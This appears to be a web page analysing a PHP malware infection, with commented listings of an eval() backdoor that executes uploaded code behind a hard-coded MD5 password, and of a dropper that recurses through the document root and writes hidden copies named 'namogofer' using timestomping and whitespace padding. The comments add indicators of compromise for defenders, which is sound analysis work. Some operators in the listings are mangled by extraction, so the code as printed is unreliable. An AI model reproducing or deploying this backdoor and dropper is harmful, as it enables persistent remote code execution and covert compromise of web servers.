|
| |
|
This is the malicious code (malcode), a backdoor on your server:
--------------------------------- BASE64CODE ------------------------
<?php error_reporting(1);
// ANALYSIS SAMPLE: this is the backdoor stub the page describes. The comments below are for
// recognising and removing it, not for running it.
// error_reporting(1) restricts reporting to E_ERROR, so warnings and notices from the calls below stay quiet.
global $HTTP_SERVER_VARS;
// Prints one line of text followed by a newline.
function say($t) { echo "$t\n"; };
// Echoes md5("testdata_<tag>"). The tags used here are 'start', 'pass', 'f' and 'end', so the
// response body contains fixed, predictable 32-hex-character markers that can be matched in
// HTTP response inspection.
function testdata($t) { say(md5("testdata_$t")); };
echo "<pre>";
testdata('start');
// Access gate: the POST field "p" is hashed with unsalted MD5 and compared (loose ==) with a
// hard-coded digest. That digest literal is a stable string to search for in web-root files
// and in base64-decoded blobs when hunting for copies of this stub.
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")
{
// Reads the uploaded file from form field "f". $HTTP_POST_FILES is the legacy long-array name
// for $_FILES and is only populated on old PHP versions with register_long_arrays enabled.
// The @ operators hide any open/read errors.
if ($code = @fread(@fopen(
$HTTP_POST_FILES["f"]["tmp_name"],"rb"),
$HTTP_POST_FILES["f"]["size"]))
{
// The uploaded bytes are executed as PHP with the privileges of the web-server process.
// Any file containing this stub should be treated as a full compromise of that account.
// Web logs will show multipart POSTs carrying fields "p" and "f" to the planted file.
eval($code);
}
else
{
// Marker emitted when the upload was missing, empty or unreadable.
testdata('f');
};
}
else {
// Marker emitted when the "p" digest does not match.
testdata('pass');
};
testdata('end');
echo "</pre>"; ?>
--------------------------------- END ------------------------
| |
|
This is the Just_a_test PHP code that is sent once to your server:
<?php error_reporting(1);
// ANALYSIS SAMPLE: start of the one-shot dropper script that the page describes.
// error_reporting(1) restricts reporting to E_ERROR, so the script leaves few traces in error output.
global $HTTP_SERVER_VARS;
// Start timestamp in seconds; walkdir() compares elapsed time (time() - $START) against the table below.
$START = time();
// Time budget table indexed by recursion depth $l (see walkdir): one entry per directory level, 9 levels in total.
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
// Writes $data to path $f and then restores timestamps so the change is not visible from
// mtime/atime (timestomping). Returns $f on success and '' when the file could not be opened.
// Defender note: because modification and access times are reset here, "recently modified"
// searches miss these files. Compare content hashes against a known-good baseline, or use
// the inode change time (ctime), which touch() does not set.
function my_fwrite($f,$data)
{
global $CURFILE;
// Snapshot the timestamps of the target file and of its parent directory before writing.
// The file values are false when the file does not exist yet.
$file_mtime = @filemtime($f);
$file_atime = @fileatime($f);
$dir_mtime = @filemtime(@dirname($f));
$dir_atime = @fileatime(@dirname($f));
// "wb" truncates an existing file or creates a new one. Errors are suppressed with @.
if ($file_h = @fopen($f,"wb"))
{
@fwrite($file_h,$data);
@fclose($file_h);
if ($file_mtime)
{
// Existing file was overwritten: put its original mtime/atime back.
@touch($f,$file_mtime,$file_atime);
}
elseif(@filemtime($CURFILE))
{
// New file: copy permissions, timestamps, group and owner from $CURFILE (the running script)
// so the planted file blends in with a file that is already on the server.
@chmod($f,@fileperms($CURFILE));
@touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
@chgrp($f,@filegroup($CURFILE));
@chown($f,@fileowner($CURFILE));
};
// Restore the parent directory's timestamps, which creating a file would otherwise have updated.
if ($dir_mtime) @touch(@dirname($f),$dir_mtime,$dir_atime);
return $f;
}
else {
return '';
};
};
// Returns the part of $f after its last "." (the file extension).
// When $f contains no dot, strrpos() returns false and the substr() offset evaluates to 1.
function ext($f)
{
return substr($f, strrpos($f, ".") + 1);
};
| |
... then it scans all of your server's directories:
// Recursive directory walker with a time budget.
//   $p    directory path; it is concatenated directly with entry names, so it is expected to end in "/"
//   $func prefix of the callback family; "{$func}_s", "_d", "_f" and "_e" are looked up by name
//   $l    current recursion depth, used as the index into $WD_TIMEOUT
// Returns 1 when the "_s" callback returns a truthy value, otherwise returns nothing.
// Defender note: every directory the web-server account can open is visited, so cleanup has to
// cover the whole tree under the document root, not only the directory of the entry script.
function walkdir($p,$func='_walkdir',$l=0)
{
global $START;
global $WD_TIMEOUT;
global $FL;
$func_f = "{$func}_f";
$func_d = "{$func}_d";
$func_s = "{$func}_s";
$func_e = "{$func}_e";
// Directories that cannot be opened are skipped silently (@ suppresses the warning).
if ($dh = @opendir("$p"))
{
// Start-of-directory callback; a truthy return value aborts this directory.
if (function_exists($func_s))
{
if ($func_s($p,$l)) return 1;
};
while ($f = @readdir($dh))
{
// NOTE(review): the comparison operator on the next line is mangled on this page (it looks like
// an HTML-extraction artefact), so the listing is not valid PHP as printed. The intent appears
// to be to stop once elapsed time reaches the budget for this depth. TODO confirm against a raw sample.
if (time() - $START )= $WD_TIMEOUT[$l] ) break;
if ($f == '.' || $f == '..' ) continue;
// Recurse into subdirectories first, then run the per-directory and per-file callbacks if they exist.
if (@is_dir ("$p$f/") ) walkdir("$p$f/",$func,$l+1);
if (@is_dir ("$p$f/") && function_exists($func_d)) $func_d("$p$f/",$l);
if (@is_file("$p$f" ) && function_exists($func_f)) $func_f("$p$f" ,$l);
};
closedir($dh);
// End-of-directory callback, called once per directory that could be opened.
if (function_exists($func_e)) $func_e($p,$l);
};
};
// Drops the first strlen($R) characters of $p, i.e. reports a path relative to the document root stored in $R.
function r_cut($p) { global $R; return substr($p,strlen($R)); };
// Prints one line of text followed by a newline.
function say($t) { echo "$t\n"; };
// Echoes md5("testdata_<tag>"): a fixed marker line that delimits the script's output in the HTTP response.
function testdata($t) { say(md5("testdata_$t")); };
// $R is the document root; $CURFILE is the filesystem path of the script that is currently running.
// $HTTP_SERVER_VARS is the legacy long-array name for $_SERVER (old PHP versions only).
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
// The planted file reuses the running script's extension and falls back to "php".
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
// Indicator of compromise: the planted file is named "namogofer.<ext>". Searching the web root
// for this file name locates the copies written by _walkdir_e.
$FN = "namogofer.$fe";
// Start-of-directory callback: resets the per-directory counters in $FCNT.
// It returns nothing, so walkdir() goes on to process the directory.
function _walkdir_s($d,$l)
{
global $FCNT;
// NOTE(review): the "=)" sequences look like "=>" mangled by the page's HTML extraction. TODO confirm.
$FCNT = array('fn' =) '','dir' =) 0,'file' =) 0,'simtype' =) 0);
};
// Per-subdirectory callback: counts the subdirectories seen in the current directory.
function _walkdir_d($d,$l)
{
global $FCNT;
$FCNT['dir' ]++;
};
// Per-file callback: counts the files in the current directory and, separately, those whose
// extension equals ext($CURFILE). The counters are only reported (see _walkdir_e); nothing is written here.
function _walkdir_f($f,$l)
{
global $FCNT;
$FCNT['file']++;
if (ext($f) == ext($CURFILE)) $FCNT['simtype']++;
};
|
|
At this point, the Just_a_test zombie code is written all over your server:
// End-of-directory callback: walkdir() calls this after closing each directory it could open.
// This is the step that plants a file named $FN ("namogofer.<ext>") inside directory $d.
// Detection and cleanup: look for that file name in every directory under the document root,
// and for PHP files that begin with a long run of blank lines and spaces before any code.
// my_fwrite() resets timestamps, so do not rely on modification times.
function _walkdir_e($d,$l)
{
global $C,$FCNT,$FN;
// NOTE(review): the operator on the next line is mangled on this page (it looks like an HTML-extraction
// artefact). It appears to cap $C[$l], the number of files written at depth $l, at 7. TODO confirm against a raw sample.
if ($C[$l](7)
{
// The written content is the decoded payload wrapped in padding on both sides, so the code sits
// off-screen when the file is opened in an editor.
if (my_fwrite("$d$FN",
str_repeat("\n",100) // Hide Code with 100 empty lines
.str_repeat(' ',150) // Hide Code with 150 spaces
//----------- Malcode is Here: ------------------------------
// The base64 literal is elided on this page. The page presents its decoded form as the
// "BASE64CODE" listing, which is the eval() backdoor.
.base64_decode('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')
.str_repeat(' ',150) // Hide Code with 150 spaces
."\n".str_repeat("\n",100))) // Hide Code with 100 empty lines
{
// On a successful write, bump the per-depth counter and echo one tab-separated report line:
// the planted file's path relative to the document root, then the dir/file/simtype counts.
$C[$l]++;
$FCNT['fn'] = r_cut("$d$FN");
say(implode("\t",$FCNT));
};
};
};
// Start the traversal at the document root with the default "_walkdir" callback family.
walkdir("$R/");
testdata('end');
// NOTE(review): "(/pre)" looks like "</pre>" mangled by the page's HTML extraction. TODO confirm.
echo "(/pre)";
?>